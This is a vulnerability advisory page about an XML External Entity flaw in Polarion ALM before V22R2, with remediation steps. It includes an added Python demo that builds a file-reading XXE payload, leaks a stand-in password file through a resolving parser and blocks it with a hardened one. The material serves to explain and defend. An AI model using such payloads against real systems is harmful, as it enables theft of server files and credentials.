OTPulse

External Entity Injection Vulnerability in Polarion ALM

Status: Monitor · Score: 5.9 · Advisory: SSA-632164 · Published: Apr 11, 2023
Attack Vector: Network
Auth Required: None
Complexity: High
User Interaction: None needed
Summary

Polarion ALM is vulnerable to XML External Entity (XXE) injection, which could allow an unauthenticated, network-based attacker to read confidential data from the server. The vulnerability affects versions prior to V22R2.

What this means
What could happen
An attacker could read files on the Polarion ALM server that the application process has access to, such as configuration files, stored credentials, or project information, and could use the same mechanism to reach internal network resources.
Who's at risk
Engineering and product development teams using Polarion ALM for application lifecycle management and requirements tracking, especially where the Polarion ALM web interface is reachable from untrusted networks. This includes teams managing safety-critical or secure system designs, where the confidentiality of requirements and project data matters.
How it could be exploited
An attacker submits a crafted XML document containing an external entity declaration, for example one whose SYSTEM identifier points at a local file or an internal URL. If Polarion ALM's XML parser resolves external entities, the entity expands to the contents of that file or URL, and the expanded content can be returned to the attacker in the application's response or error output. No credentials are needed, but the attack depends on finding an input path that the server parses as XML.
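As an added example (not part of this advisory and not Polarion's code), the following Python script shows the mechanism described above with the standard library's SAX parser. `parse_vulnerable` switches on external general entity resolution, which is the behaviour of any resolving XML parser (a default JAXP DocumentBuilder in a Java application behaves the same way), and the crafted document pulls a server-side file into the `<title>` field. `parse_hardened` keeps that feature off and additionally rejects any DOCTYPE, so no entity can be declared at all. The element names, the `polarion.properties` file and its `db.password=S3cret` line are constructed stand-ins for the demo, not real Polarion artefacts.

```python
"""XXE demonstration: a resolving parser leaks a server-side file; the hardened
parser refuses any document that carries a DOCTYPE.  Constructed example, not
Polarion ALM code."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


class DoctypeRejected(ValueError):
    """Raised by the hardened parser as soon as a DOCTYPE appears."""


class TitleCollector(ContentHandler):
    """Collects the text of <title>; stands in for whatever field the
    application reads out of the submitted XML."""

    def __init__(self):
        super().__init__()
        self._in_title = False
        self.title = ""

    def startElement(self, name, attrs):
        if name == "title":
            self._in_title = True

    def endElement(self, name):
        if name == "title":
            self._in_title = False

    def characters(self, content):
        if self._in_title:
            self.title += content


class RejectDoctype:
    """Lexical handler: expat calls startDTD when it meets <!DOCTYPE ...>."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected("DOCTYPE declarations are not accepted: %r" % name)

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def make_xxe_payload(target_path):
    """Constructed attacker document: an external general entity whose SYSTEM
    identifier points at a file on the server, expanded inside <title>."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE item [\n'
        '  <!ENTITY leak SYSTEM "file://%s">\n'
        ']>\n'
        '<item><title>&leak;</title></item>\n' % target_path
    ).encode()


def parse_vulnerable(xml_bytes):
    """Parser with external general entity resolution enabled.  The returned
    title now contains the referenced file's contents."""
    handler = TitleCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)   # the dangerous switch
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.title


def parse_hardened(xml_bytes):
    """Parser that leaves external entities off (the xml.sax default) and
    refuses any DOCTYPE, so neither external nor internal entities exist."""
    handler = TitleCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, RejectDoctype())
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.title


def demo():
    """Write a stand-in config file, attack it, and return
    (text leaked by the vulnerable parser, outcome of the hardened parser)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "polarion.properties")  # constructed
        with open(secret_path, "w") as fh:
            fh.write("db.password=S3cret\n")                    # constructed
        payload = make_xxe_payload(secret_path)
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            hardened = "parsed"
        except DoctypeRejected:
            hardened = "rejected"
    return leaked, hardened


if __name__ == "__main__":
    print(demo())
```

In a Java/JAXP parser, which is the more likely setting for an application such as Polarion ALM, the equivalent of `RejectDoctype` is setting the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the parser factory; where DOCTYPEs are genuinely needed, disable `http://xml.org/sax/features/external-general-entities`, `http://xml.org/sax/features/external-parameter-entities` and `http://apache.org/xml/features/nonvalidating/load-external-dtd` instead.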
Prerequisites
  • Network access to the Polarion ALM web application (typically port 80/443)
  • Polarion ALM version prior to V22R2
  • An input path through which the application accepts and parses attacker-supplied XML
Tags:
  • remotely exploitable
  • no authentication required
  • sensitive data disclosure
  • high attack complexity (consistent with the score vector above)
Exploitability
Low exploit probability (EPSS 0.2%)
Affected products (1)
Product | Affected Versions | Fix Status
Polarion ALM | < V22R2 | V22R2
Remediation & Mitigation
Do now

HARDENING: Restrict network access to Polarion ALM to authorized users and systems only; use firewall rules to limit exposure to engineering workstations and build systems.
WORKAROUND: If Polarion ALM's configuration offers a setting to disable external entity or DTD processing in its XML parsing, turn it off. This advisory does not name such a setting, so treat the update below as the real fix.
Schedule — requires maintenance window

Updating may require restarting the Polarion ALM server; plan for a service interruption.

HOTFIX: Update Polarion ALM to V22R2 or later.
Long-term hardening

HARDENING: Configure every XML parser that handles externally supplied input to reject DOCTYPE declarations, or at minimum to disable external general entities, external parameter entities and external DTD loading; validate incoming XML against the expected schema before processing it.